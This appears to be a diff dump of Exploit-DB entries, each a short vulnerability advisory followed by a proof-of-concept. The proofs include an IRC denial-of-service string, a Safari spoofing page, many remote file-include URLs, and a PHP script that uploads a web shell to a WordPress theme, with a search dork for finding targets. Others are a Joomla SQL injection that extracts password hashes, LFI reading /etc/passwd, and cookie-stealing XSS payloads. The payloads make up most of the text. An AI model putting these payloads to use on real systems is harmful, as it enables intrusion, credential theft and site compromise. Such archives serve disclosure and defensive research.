source: http://www.securityfocus.com/bid/28413/info
The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input.
Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users.
This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12.
/mode nickname i i i i i i i i i i i i i i i r r r r s

9
platforms/osx/remote/31473.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28405/info
Apple Safari is prone to a content-spoofing vulnerability that allows attackers to populate a vulnerable Safari browser window with arbitrary malicious content. During such an attack, the URL and window title will display the intended site, while the body of the webpage is spoofed.
Safari 3.1 running on Microsoft Windows is reported vulnerable.
NOTE: This issue may be related to the vulnerability discussed in BID 24457 (Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability).
<html> Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian <html> <head> <title>Recipe 6.6</title> <script type="text/javascript"> var newWindow; function makeNewWindow() { if (!newWindow || newWindow.closed) { newWindow = window.open('http://www.google.com.ar/','_self'); setTimeout("writeToWindow()", 50); } else if (newWindow.focus) { newWindow.focus(); } } function writeToWindow() { var newContent = "<html><head><title>Google</title></head>"; newContent += "<body> <h1>FAKE PAGE</h1>"; newWindow.document.write(newContent); newWindow.document.close(); } </script> </head> <body> <form> <input type="button" value="test spoof!" onclick="makeNewWindow();"/> </form> </body> </html>

9
platforms/php/remote/31479.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/index.php3?DOCUMENT_ROOT=ZoRLu.txt?

27
platforms/php/webapps/31424.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
?#?Greetz? : PhantomGhost, Deto Beiber, All Moroccan Hackers.
We are Moroccans, we are genuis !
<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
File Access :
http://127.0.0.1/uploads/[years]/[month]/your_shell.php

35
platforms/php/webapps/31458.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit: PHP Webcam Video Conference - LFI/XSS
# Date: 06/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.videowhisper.com/
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference
# Solution: Upgrade from to the new version on videowhisper vendor homepage.
[1] Local File Include - rtmp_login.php
P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd
[+] rtmp_rlogin.php
$session = $_GET['s'];
$filename1 = "uploads/_sessions/$session";
if (file_exists($filename1))
{
echo implode('', file($filename1));
}
else
{
echo "VideoWhisper=1&login=0";
}
?>
[2] XSS Reflected
P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]

24
platforms/php/webapps/31459.txt Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: Joomla 3.2.1 sql injection
# Date: 05/02/2014
# Exploit Author: kiall-9@mail.com
# Vendor Homepage: http://www.joomla.org/
# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip
# Version: 3.2.1 (default installation with Test sample data)
# Tested on: Virtualbox (debian) + apache
POC=>
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\
will cause an error:
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 )
I modified the original error.php file with this code --- <?php print_r(error_get_last()); ?> --- in order to obtain something useful. ;-)
Now i can easily exploit this flaw:
http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29
and obtain the hash:
1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5
CheerZ>

9
platforms/php/webapps/31467.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28399/info
phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyChat 0.14.5 is vulnerable; other versions may also be affected.
http://www.example.com/chat/setup.php3?Lang="<xss>

14
platforms/php/webapps/31468.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/28400/info
My Web Doc is prone to multiple authentication-bypass vulnerabilities.
Attackers can leverage these issues to compromise the application, which could aid in other attacks.
My Web Doc 2000 Final is vulnerable; other versions may also be affected.
http://www.example.com/mywebdocadd.php3?x
http://www.example.com/mywebdoccalendaradd.php3?x
http://www.example.com/mywebdoclisting.php3?x
http://www.example.com/mywebdocchangepassword.php3?x
http://www.example.com/mywebdocadduser.php3?x
http://www.example.com/mywebdocuserlisting.php3?x

9
platforms/php/webapps/31469.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_admin.php?PathToComment=ZoRLu.txt?

9
platforms/php/webapps/31470.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt?

7
platforms/php/webapps/31471.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28402/info
TinyPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?PHPSESSID="><xss>

7
platforms/php/webapps/31472.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28403/info
cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/frontend/x/manpage.html?<xss>

8
platforms/php/webapps/31476.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28412/info
Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

9
platforms/php/webapps/31480.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/locate.php3?DOCUMENT_ROOT=ZoRLu.txt?,

9
platforms/php/webapps/31481.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/search_results.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31482.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/classifieds/index.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31483.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/classifieds/view.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31484.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/index.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31485.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/manager.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31486.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/pass.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31487.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/remember.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31488.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/sign-up.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31489.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/update.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31490.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/userSet.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31491.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlcenter/verify.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31492.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterCats.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31493.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31494.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31495.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterNews.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31496.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/alterTheme.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31497.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/color_help.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31498.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createdb.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31499.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31500.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31501.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createL.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31502.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createM.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31503.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createNews.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31504.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createP.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31505.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createS.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31506.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/createT.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31507.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/index.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31508.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/mailadmin.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31509.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/controlpannel/setUp.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31510.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/sendit.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31511.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/sendit2.php3?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31512.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/adminHead.inc?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31513.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/include/usersHead.inc?DOCUMENT_ROOT=ZoRLu.txt?

9
platforms/php/webapps/31514.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28417/info
Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Quick Classifieds 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/QuickSystems_path/style/default.scheme.inc?DOCUMENT_ROOT=ZoRLu.txt?

74
platforms/php/webapps/31516.txt Executable file
View file

@ -0,0 +1,74 @@
Advisory: Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities
Advisory ID: SSCHADV2014-003
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.7.5
Vendor URL: http://www.s9y.org/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities
==========================
PoC-Exploit
==========================
// Stored-XSS with "Real name"
(1) Login as "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to "><script>alert(document.cookie)</script>
The XSS will be executed for the Administrator if he manages the users (Backend -> Administration -> Manage users)
// SQL-Injection - with "serendipity[install_plugin]"
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]
// Reflected XSS_1 - "serendipity[install_plugin]"
http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b<script>alert(1)</script>%2f%2f912
// Reflected XSS_2 - "serendipity[id]"
POST http://[target]/serendipity/serendipity_admin.php?
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Btimestamp%5D=1391086127&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=0fb9473e000f67c7d530e0698c8ff2dc&serendipity%5Btitle%5D=test1&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391086127&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A48&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test1&serendipity%5Ballow_comments%5D=true&serendipity%5Bextended%5D=
// Reflected XSS_3 - "serendipity[timestamp]"
POST http://[target]/serendipity/serendipity_admin.php?
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=d9e231ef9eaeb5e58336806484de7600&serendipity%5Btitle%5D=test&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391084636&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A23&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test%3Cstrong%3E%3C%2Fstrong%3E%3Cblockquote%3E%3C%2Fblockquote%3E&serendipity%5Ballow_comments%5D=true&serendipity%5Bmoderate_comments%5D=true&serendipity%5Bextended%5D
==========================
Solution
==========================
Upgrade to the latest version Serendipity 1.7.7
==========================
Disclosure Timeline
==========================
30-Jan-2014 - developer informed by email
30-Jan-2014 - feedback from developer
31-Jan-2014 - first diff tested
03-Feb-2014 - second diff tested
04-Feb-2014 - third diff tested
06-Feb-2014 - release of Serendipity 1.7.7
==========================
Credits
==========================
Vulnerabilities found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://s9y.org/
http://blog.s9y.org/archives/253-Serendipity-1.7.7-released.html
http://www.darksecurity.de/advisories/2014/SSCHADV2014-003.txt

35
platforms/php/webapps/31517.txt Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: [CTERA Project Folders - Stored XSS]
 
# Date: [11-Mar-2013]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.ctera.com]
# Version: [3.2.29.0 and 3.2.42.0 ]
# Tested on: [ctera os]
# CVE : [CVE-2013-2639]
 
#OVERVIEW
Standard Ctera User can define a particular “description” for a ProjectFolder that cause javascript code execution and HTML injection.
 
#INTRODUCTION
CTERA Networks (http://www.ctera.com)bridges the gap between cloud storage and local storage, providing optimized performance and end-to-end security. Our solutions accelerate deployment of cloud services and eliminate the costs associated with file servers, backup servers and tape drives. Service providers and enterprises use CTERA to deliver services such as backup, file sync and share, mobile collaboration, managed NAS and cloud on-ramping, based on the cloud infrastructure of their choice.
 
#VULNERABILITY DESCRIPTION
User can forge particular description on Project Folder that permit XSS, HTML Injection (add of link, images, button ecc). As the project folder can be shared with different users that vulnerability permit the grabbing of sessions cookies.
 
For test the vuln: Create a Project Folder with the following description (the particular path depend of firmware version)
</xml><img src="https://192.168.3.2/admingui/common.3.2.29.291012114828/script/ext/resources/images/default/grid/loading.gif" onload="alert(document.cookie);">
<xml>
#VERSIONS AFFECTED
